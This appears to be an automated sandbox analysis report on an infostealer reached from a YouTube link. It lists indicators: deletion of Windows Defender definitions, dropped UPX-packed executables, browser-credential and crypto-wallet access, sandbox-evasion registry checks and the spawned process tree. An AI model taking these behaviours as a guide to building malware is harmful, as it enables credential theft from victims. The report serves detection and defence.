hxxps://www[.]youtube[.]com/watch?v=0Ghtmx9fSfA

Resubmissions

01/09/2023, 22:57

230901-2xpf9sae74 1

01/09/2023, 22:41

230901-2l8qrsac3s 8

01/09/2023, 22:32

230901-2gfjesac2x 10

Analysis

max time kernel
186s
max time network
191s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
01/09/2023, 22:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.youtube.com/watch?v=0Ghtmx9fSfA

Score

10^/10

evasion spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5972	MpCmdRun.exe

Executes dropped EXE 3 IoCs

pid	Process
5072	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
4596	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe
3804	HardcoreStalCraft.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001b163-968.dat	upx
behavioral1/files/0x000600000001b163-969.dat	upx
behavioral1/memory/3804-972-0x00007FF96F090000-0x00007FF96F679000-memory.dmp	upx
behavioral1/files/0x000600000001b158-975.dat	upx
behavioral1/files/0x000600000001b161-977.dat	upx
behavioral1/files/0x000600000001b161-976.dat	upx
behavioral1/files/0x000600000001b158-974.dat	upx
behavioral1/memory/3804-980-0x00007FF985EA0000-0x00007FF985EAF000-memory.dmp	upx
behavioral1/memory/3804-978-0x00007FF980540000-0x00007FF980563000-memory.dmp	upx
behavioral1/files/0x000600000001b15b-986.dat	upx
behavioral1/memory/3804-987-0x00007FF980470000-0x00007FF98049D000-memory.dmp	upx
behavioral1/files/0x000600000001b15b-985.dat	upx
behavioral1/files/0x000800000001b157-988.dat	upx
behavioral1/files/0x000800000001b157-989.dat	upx
behavioral1/files/0x000600000001b15e-992.dat	upx
behavioral1/files/0x000600000001b15e-990.dat	upx
behavioral1/memory/3804-991-0x00007FF980870000-0x00007FF980889000-memory.dmp	upx
behavioral1/memory/3804-994-0x00007FF980250000-0x00007FF980273000-memory.dmp	upx
behavioral1/files/0x000600000001b166-993.dat	upx
behavioral1/files/0x000600000001b166-995.dat	upx
behavioral1/files/0x000600000001b15d-997.dat	upx
behavioral1/files/0x000600000001b165-998.dat	upx
behavioral1/files/0x000600000001b15d-996.dat	upx
behavioral1/memory/3804-1000-0x00007FF96EF10000-0x00007FF96F087000-memory.dmp	upx
behavioral1/memory/3804-1002-0x00007FF980520000-0x00007FF980539000-memory.dmp	upx
behavioral1/memory/3804-1001-0x00007FF982210000-0x00007FF98221D000-memory.dmp	upx
behavioral1/files/0x000600000001b160-1005.dat	upx
behavioral1/files/0x000600000001b162-1007.dat	upx
behavioral1/files/0x000600000001b160-1008.dat	upx
behavioral1/files/0x000600000001b162-1009.dat	upx
behavioral1/memory/3804-1010-0x00007FF96EAD0000-0x00007FF96EB88000-memory.dmp	upx
behavioral1/memory/3804-1006-0x00007FF980220000-0x00007FF98024E000-memory.dmp	upx
behavioral1/memory/3804-1011-0x00007FF96F090000-0x00007FF96F679000-memory.dmp	upx
behavioral1/memory/3804-1012-0x00007FF96EB90000-0x00007FF96EF08000-memory.dmp	upx
behavioral1/files/0x000600000001b15f-1004.dat	upx
behavioral1/files/0x000600000001b15f-1003.dat	upx
behavioral1/files/0x000600000001b165-999.dat	upx
behavioral1/files/0x000600000001b15a-1014.dat	upx
behavioral1/memory/3804-1020-0x00007FF97EE90000-0x00007FF97EEA4000-memory.dmp	upx
behavioral1/memory/3804-1021-0x00007FF981FD0000-0x00007FF981FDD000-memory.dmp	upx
behavioral1/files/0x000600000001b167-1019.dat	upx
behavioral1/memory/3804-1022-0x00007FF980540000-0x00007FF980563000-memory.dmp	upx
behavioral1/files/0x000600000001b15c-1016.dat	upx
behavioral1/files/0x000600000001b15c-1015.dat	upx
behavioral1/memory/3804-1023-0x00007FF96E9B0000-0x00007FF96EACC000-memory.dmp	upx
behavioral1/files/0x000600000001b15a-1013.dat	upx
behavioral1/memory/3804-1040-0x00007FF980250000-0x00007FF980273000-memory.dmp	upx
behavioral1/memory/3804-1047-0x00007FF982210000-0x00007FF98221D000-memory.dmp	upx
behavioral1/memory/3804-1051-0x00007FF980520000-0x00007FF980539000-memory.dmp	upx
behavioral1/memory/3804-1054-0x00007FF980220000-0x00007FF98024E000-memory.dmp	upx
behavioral1/memory/3804-1068-0x00007FF96EAD0000-0x00007FF96EB88000-memory.dmp	upx
behavioral1/memory/3804-1081-0x00007FF96EB90000-0x00007FF96EF08000-memory.dmp	upx
behavioral1/memory/3804-1203-0x00007FF96F090000-0x00007FF96F679000-memory.dmp	upx
behavioral1/memory/3804-1208-0x00007FF980540000-0x00007FF980563000-memory.dmp	upx
behavioral1/memory/3804-1346-0x00007FF96F090000-0x00007FF96F679000-memory.dmp	upx
behavioral1/memory/3804-1493-0x00007FF96F090000-0x00007FF96F679000-memory.dmp	upx
behavioral1/memory/3804-1494-0x00007FF980540000-0x00007FF980563000-memory.dmp	upx
behavioral1/memory/3804-1499-0x00007FF96EF10000-0x00007FF96F087000-memory.dmp	upx
behavioral1/memory/3804-1505-0x00007FF97EE90000-0x00007FF97EEA4000-memory.dmp	upx
behavioral1/memory/3804-1506-0x00007FF96F090000-0x00007FF96F679000-memory.dmp	upx
behavioral1/memory/3804-1507-0x00007FF981FD0000-0x00007FF981FDD000-memory.dmp	upx
behavioral1/memory/3804-1509-0x00007FF96E9B0000-0x00007FF96EACC000-memory.dmp	upx
behavioral1/memory/3804-1510-0x00007FF985EA0000-0x00007FF985EAF000-memory.dmp	upx
behavioral1/memory/3804-1508-0x00007FF980540000-0x00007FF980563000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
116	ip-api.com

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\810424605.pri	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5928	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
2188	tasklist.exe
5352	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5400	systeminfo.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
5492	taskkill.exe
4584	taskkill.exe
1344	taskkill.exe
5044	taskkill.exe
5416	taskkill.exe
2540	taskkill.exe
5048	taskkill.exe
5296	taskkill.exe
5800	taskkill.exe
6140	taskkill.exe
6136	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133380812214507541"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2398454716-3289288241-2843025796-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2398454716-3289288241-2843025796-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
4860	powershell.exe
4860	powershell.exe
928	powershell.exe
928	powershell.exe
4188	powershell.exe
4188	powershell.exe
4860	powershell.exe
4860	powershell.exe
4188	powershell.exe
928	powershell.exe
928	powershell.exe
4860	powershell.exe
4188	powershell.exe
4188	powershell.exe
5364	powershell.exe
5364	powershell.exe
928	powershell.exe
5516	Process not Found
5516	Process not Found
5364	powershell.exe
5516	Process not Found
5364	powershell.exe
5804	taskmgr.exe
5804	taskmgr.exe
5516	Process not Found
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5492	powershell.exe
5492	powershell.exe
5492	powershell.exe
5804	taskmgr.exe
5312	powershell.exe
5312	powershell.exe
5312	powershell.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
5804	taskmgr.exe
1996	powershell.exe
1996	powershell.exe
5804	taskmgr.exe
1996	powershell.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5804	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: 33	220	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	220	AUDIODG.EXE
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe
Token: SeShutdownPrivilege	3032	chrome.exe
Token: SeCreatePagefilePrivilege	3032	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
2536	7zG.exe
2672	NOTEPAD.EXE
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe
5804	taskmgr.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
356	firefox.exe
356	firefox.exe
356	firefox.exe
356	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3032 wrote to memory of 4196	3032	chrome.exe	69
PID 3032 wrote to memory of 4196	3032	chrome.exe	69
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 4960	3032	chrome.exe	73
PID 3032 wrote to memory of 2324	3032	chrome.exe	72
PID 3032 wrote to memory of 2324	3032	chrome.exe	72
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74
PID 3032 wrote to memory of 4452	3032	chrome.exe	74

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.youtube.com/watch?v=0Ghtmx9fSfA
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff982969758,0x7ff982969768,0x7ff982969778
  2⤵
  PID:4196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:2324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1532 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:2
  2⤵
  PID:4960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2040 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:4452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2864 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:4068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2876 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:1876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4320 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3060 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:4140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4696 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:3320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:4112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:2428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5400 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4860 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:3120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4752 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:3872
- C:\Program Files\Google\Chrome\Application\chrome.exe
